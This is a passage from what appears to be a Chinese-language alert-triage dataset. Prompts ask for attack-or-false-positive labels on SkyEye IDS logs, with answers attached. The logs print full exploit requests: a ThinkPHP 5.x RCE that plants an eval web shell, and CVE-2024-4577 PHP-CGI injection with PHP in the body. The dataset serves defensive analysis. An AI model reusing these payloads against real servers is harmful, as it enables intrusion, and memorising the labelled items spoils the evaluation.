"skyeye_id": "", "payload": {"req_header": "R0VUIC8/cz0vaW5kZXgvJTVDdGhpbmslNUNhcHAvaW52b2tlZnVuY3Rpb24mZnVuY3Rpb249Y2FsbF91c2VyX2Z1bmNfYXJyYXkmdmFyc1swXT1maWxlX3B1dF9jb250ZW50cyZ2YXJzWzFdW109d3JwYW8ucGhwJnZhcnNbMV1bXT08P3BocCUyMGNsYXNzJTIwQ3VzdG9tRXhlY3V0b3IlMjB7JTIwJTIwcHVibGljJTIwZnVuY3Rpb24lMjBfX2NvbnN0cnVjdCgkY29kZSl7JTIwJTIwQGV2YWwoIi8qQ3VzdG9tQ29kZUV4ZWN1dG9yKi8iJTIwLiUyMCRjb2RlKTslMjAlMjB9JTIwfSUyMCUyMG5ldyUyMEN1c3RvbUV4ZWN1dG9yKCRfUkVRVUVTVFsnNTAnXSk7JTIwPz54aW5naHVveGlzZSQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vd3d3LmhuLnNnY2MuY24vP3M9L2luZGV4LyU1Q3RoaW5rJTVDYXBwL2ludm9rZWZ1bmN0aW9uJmZ1bmN0aW9uPWNhbGxfdXNlcl9mdW5jX2FycmF5JnZhcnNbMF09ZmlsZV9wdXRfY29udGVudHMmdmFyc1sxXVtdPXdycGFvLnBocCZ2YXJzWzFdW109PD9waHAgY2xhc3MgQ3VzdG9tRXhlY3V0b3IgeyAgcHVibGljIGZ1bmN0aW9uIF9fY29uc3RydWN0KCRjb2RlKXsgIEBldmFsKCIvKkN1c3RvbUNvZGVFeGVjdXRvciovIiAuICRjb2RlKTsgIH0gfSAgbmV3IEN1c3RvbUV4ZWN1dG9yKCRfUkVRVUVTVFsnNTAnXSk7ID8+eGluZ2h1b3hpc2UkDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4xKQ0KSG9zdDogd3d3LmhuLnNnY2MuY24NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "2018 年 12 月 9 日, ThinkPHP 官方发布针对 5.x 版本的重要更新,其中涉及一个安全更新.", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "api": "www.hn.sgcc.cn/", "cache-control": "no-cache", "first_access_time": "2024-11-27 10:11:19", "hazard_level": "6", "accept-language": "zh-cn", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "ThinkPHP 5.x 远程代码执行", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "d806cc17d7d7ac86a2e381b900e0d267", "proto": "http", "xff": "", "alarm_id": "20241127_ff2ea4c05f5e0c31d83525028650b18e", "vuln_desc": "2018 年 12 月 9 日, ThinkPHP 官方发布针对 5.x 版本的重要更新,其中涉及一个安全更新.", "attack_chain": "0x02010000", "access_time": "2024-11-27 10:11:19", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16030000", "vuln_harm": "该更新修复了由于框架对于控制器名没有做到足够的检测,会导致在使用 Pathinfo 访问模式的情况下,造成可能的 GetShell", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732673460", "code_language": "PHP", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "45.64.52.160", "public_date": "2018-12-11 18:26:31", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "ThinkPHP", "super_attack_chain": "0x02000000", "hit_end": "49", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x100205af", "req_header": "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$ HTTP/1.1\r\nAccept: */*\r\nReferer: http://www.hn.sgcc.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php class CustomExecutor { public function __construct($code){ @eval(\"/*CustomCodeExecutor*/\" . $code); } } new CustomExecutor($_REQUEST['50']); ?>xinghuoxise$\r\nAccept-Language: zh-cn\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\nHost: www.hn.sgcc.cn\r\nCache-Control: no-cache\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567983-ThinkPHP 5.x 远程代码执行", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"IE/9.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "54284", "h_url": "/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wrpao.php&vars[1][]=<?php%20class%20CustomExecutor%20{%20%20public%20function%20__construct($code){%20%20@eval(\"/*CustomCodeExecutor*/\"%20.%20$code);%20%20}%20}%20%20new%20CustomExecutor($_REQUEST['50']);%20?>xinghuoxise$", "user-agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673445", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732673445, "vuln_harm": "未经身份认证的远程攻击者可以通过参数注入攻击在远程PHP服务器上执行任意代码。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 80, "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "dport": 80, "vuln_name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)", "rsp_status": 0, "code_language": "", "solution": "1、安全更新\r\n目前官方已有可更新版本,建议受影响用户升级至最新版本。注:由于 PHP 8.0、PHP 7 和 PHP 5 的分支已终止使用,并且不再维护,服务器管理员可以参考“缓解方案”中的临时补丁建议。官方下载地址:https://www.php.net/downloads.php\r\n\r\n2、缓解方案:\r\n1.对于无法升级PHP的用户:\r\n以下重写规则可用于阻止攻击。需要注意的是,这些规则仅对繁体中文、简体中文和日语语言环境起到临时缓解作用。在实际操作中,仍然建议更新到补丁版本或迁移架构。\r\nRewriteEngineOn\r\nRewriteCond%{QUERY_STRING} ^%ad [NC]\r\nRewriteRule .? - [F,L]\r\n2. 对于使用 XAMPP for Windows 的用户:\r\n如果确认不需要 PHP CGI 功能,可以通过修改以下 Apache HTTP Server 配置来避免受到该漏洞的影响:\r\nC:/xampp/apache/conf/extra/httpd-xampp.conf\r\n找到相应的行:\r\nScriptAlias /php-cgi/\"C:/xampp/php/\"\r\n并将其注释掉:\r\n# ScriptAlias /php-cgi/\"C:/xampp/php/\"", "hit_start": 60, "detail_info": "PHP(Hypertext Preprocessor,超文本预处理器)是一种广泛使用的开源脚本语言,主要用于Web开发,用于生成动态网页内容。PHP的语法借鉴了C、Java、Perl等语言的特点,易于学习,并且可以快速执行。\r\nPHP CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)。影响范围:PHP 8.3 < 8.3.8、PHP 8.2 < 8.2.20、PHP 8.1 < 8.1.29", "xff": "", "sip": "45.64.52.160", "vuln_desc": "PHP(Hypertext Preprocessor,超文本预处理器)是一种广泛使用的开源脚本语言,主要用于Web开发,用于生成动态网页内容。PHP的语法借鉴了C、Java、Perl等语言的特点,易于学习,并且可以快速执行。\r\nPHP CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)。影响范围:PHP 8.3 < 8.3.8、PHP 8.2 < 8.2.20、PHP 8.1 < 8.1.29", "public_date": "2024-06-11 17:06:36", "sport": 57962}, "detail_info": "PHP(Hypertext Preprocessor,超文本预处理器)是一种广泛使用的开源脚本语言,主要用于Web开发,用于生成动态网页内容。PHP的语法借鉴了C、Java、Perl等语言的特点,易于学习,并且可以快速执行。\r\nPHP CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)。影响范围:PHP 8.3 < 8.3.8、PHP 8.2 < 8.2.20、PHP 8.1 < 8.1.29", "file_md5": "f1845ea9370448ca821d7a2f698ac3c7", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/php-cgi/php-cgi.exe", "first_access_time": "2024-11-27 10:10:45", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "6a2fc98550864477fd9b1a99dd750ded", "xff": "", "vuln_desc": "PHP(Hypertext Preprocessor,超文本预处理器)是一种广泛使用的开源脚本语言,主要用于Web开发,用于生成动态网页内容。PHP的语法借鉴了C、Java、Perl等语言的特点,易于学习,并且可以快速执行。\r\nPHP CGI Windows平台存在远程代码执行漏洞(CVE-2024-4577)。影响范围:PHP 8.3 < 8.3.8、PHP 8.2 < 8.2.20、PHP 8.1 < 8.1.29", "attack_chain": "0x02020000", "vuln_harm": "未经身份认证的远程攻击者可以通过参数注入攻击在远程PHP服务器上执行任意代码。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673426", "code_language": "", "public_date": "2024-06-11 17:06:36", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "80", "h_proto_version": "HTTP/1.1", "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021bce", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "referer": "http://www.hn.sgcc.cn/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "vlan_id": "", "vuln_type": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、安全更新\r\n目前官方已有可更新版本,建议受影响用户升级至最新版本。注:由于 PHP 8.0、PHP 7 和 PHP 5 的分支已终止使用,并且不再维护,服务器管理员可以参考“缓解方案”中的临时补丁建议。官方下载地址:https://www.php.net/downloads.php\r\n\r\n2、缓解方案:\r\n1.对于无法升级PHP的用户:\r\n以下重写规则可用于阻止攻击。需要注意的是,这些规则仅对繁体中文、简体中文和日语语言环境起到临时缓解作用。在实际操作中,仍然建议更新到补丁版本或迁移架构。\r\nRewriteEngineOn\r\nRewriteCond%{QUERY_STRING} ^%ad [NC]\r\nRewriteRule .? - [F,L]\r\n2. 对于使用 XAMPP for Windows 的用户:\r\n如果确认不需要 PHP CGI 功能,可以通过修改以下 Apache HTTP Server 配置来避免受到该漏洞的影响:\r\nC:/xampp/apache/conf/extra/httpd-xampp.conf\r\n找到相应的行:\r\nScriptAlias /php-cgi/\"C:/xampp/php/\"\r\n并将其注释掉:\r\n# ScriptAlias /php-cgi/\"C:/xampp/php/\"", "hit_start": "60", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvcGhwLWNnaS9waHAtY2dpLmV4ZT8lYWRkK2FsbG93X3VybF9pbmNsdWRlJTNkMSslYWRkK2F1dG9fcHJlcGVuZF9maWxlJTNkcGhwOi8vaW5wdXQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiB6aC1jbg0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL3BocC1jZ2kvcGhwLWNnaS5leGU/JWFkZCthbGxvd191cmxfaW5jbHVkZSUzZDErJWFkZCthdXRvX3ByZXBlbmRfZmlsZSUzZHBocDovL2lucHV0DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODMuMC40MTAzLjExNiBTYWZhcmkvNTM3LjM2DQpSRURJUkVDVC1TVEFUVVM6IDENCkNvbnRlbnQtTGVuZ3RoOiAyNQ0KSG9zdDogd3d3LmhuLnNnY2MuY24NCg0K", "req_body": "PD9waHAgZWNobyBtZDUoImNtZCIpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_05319ac52cdbbb4bbccd9d301251e2ee", "access_time": "2024-11-27 10:10:45", "content-length": "25", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "redirect-status": "1", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/php-cgi/php-cgi.exe", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php-cgi.exe", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://www.hn.sgcc.cn/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36\r\nREDIRECT-STATUS: 1\r\nContent-Length: 25\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "<?php echo md5(\"cmd\"); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268573646-PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Chrome/83.0.4103\", \"hw_type\": \"PC\"}}", "sport": "57962", "h_url": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673445", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732673445, "vuln_harm": "远程攻击者可利用该漏洞在服务器进程上下文中查看文件的源代码,获取敏感信息,在受影响计算机上运行任意PHP代码,也可能执行其他攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 74, "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "dport": 80, "vuln_name": "PHP CGI查询参数信息泄漏漏洞", "rsp_status": 0, "code_language": "其他", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\r\n<a href=\"http://www.php.net/archive/2012.php#id2012-05-08-1\" target=\"_blank\" rel=\"nofollow\">http://www.php.net/archive/2012.php#id2012-05-08-1</a>", "hit_start": 54, "detail_info": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "public_date": "2018-11-14 00:00:00", "sport": 57962}, "detail_info": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "file_md5": "f1845ea9370448ca821d7a2f698ac3c7", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/php-cgi/php-cgi.exe", "first_access_time": "2024-11-27 10:10:45", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP CGI查询参数信息泄漏漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "5be96688b5a15b703e8aef6d87b5b441", "xff": "", "vuln_desc": "PHP是一款免费开放源代码的WEB脚本语言包,可使用在Microsoft Windows、Linux和Unix操作系统下。<br/>PHP中存在信息泄漏漏洞。", "attack_chain": "0x02030000", "vuln_harm": "远程攻击者可利用该漏洞在服务器进程上下文中查看文件的源代码,获取敏感信息,在受影响计算机上运行任意PHP代码,也可能执行其他攻击。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673426", "code_language": "其他", "public_date": "2018-11-14 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "74", "h_proto_version": "HTTP/1.1", "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10000bfa", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "referer": "http://www.hn.sgcc.cn/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "vlan_id": "", "vuln_type": "PHP CGI查询参数信息泄漏漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\r\n<a href=\"http://www.php.net/archive/2012.php#id2012-05-08-1\" target=\"_blank\" rel=\"nofollow\">http://www.php.net/archive/2012.php#id2012-05-08-1</a>", "hit_start": "54", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvcGhwLWNnaS9waHAtY2dpLmV4ZT8lYWRkK2FsbG93X3VybF9pbmNsdWRlJTNkMSslYWRkK2F1dG9fcHJlcGVuZF9maWxlJTNkcGhwOi8vaW5wdXQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiB6aC1jbg0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL3BocC1jZ2kvcGhwLWNnaS5leGU/JWFkZCthbGxvd191cmxfaW5jbHVkZSUzZDErJWFkZCthdXRvX3ByZXBlbmRfZmlsZSUzZHBocDovL2lucHV0DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODMuMC40MTAzLjExNiBTYWZhcmkvNTM3LjM2DQpSRURJUkVDVC1TVEFUVVM6IDENCkNvbnRlbnQtTGVuZ3RoOiAyNQ0KSG9zdDogd3d3LmhuLnNnY2MuY24NCg0K", "req_body": "PD9waHAgZWNobyBtZDUoImNtZCIpOyA/Pg==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_9c319307efc12daf8df75a0cd17a9048", "access_time": "2024-11-27 10:10:45", "content-length": "25", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "redirect-status": "1", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/php-cgi/php-cgi.exe", "src_mac": "00:94:a1:5e:6e:87", "file_name": "php-cgi.exe", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://www.hn.sgcc.cn/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36\r\nREDIRECT-STATUS: 1\r\nContent-Length: 25\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "<?php echo md5(\"cmd\"); ?>", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268438522-PHP CGI查询参数信息泄漏漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Chrome/83.0.4103\", \"hw_type\": \"PC\"}}", "sport": "57962", "h_url": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673445", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732673445, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 24, "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "dport": 80, "vuln_name": "PHP代码执行攻击", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 4, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "45.64.52.160", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2018-09-13 16:03:57", "sport": 57962}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "f1845ea9370448ca821d7a2f698ac3c7", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/php-cgi/php-cgi.exe", "first_access_time": "2024-11-27 10:10:45", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "bd84d42bcb2fb9575488caf53593cdc9", "xff": "", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02010000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673426", "code_language": "PHP", "public_date": "2018-09-13 16:03:57", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "24", "h_proto_version": "HTTP/1.1", "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020593", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "referer": "http://www.hn.sgcc.cn/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input", "vlan_id": "", "vuln_type": "PHP代码执行攻击", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "4", "skyeye_id": "", "payload": {"req_header": 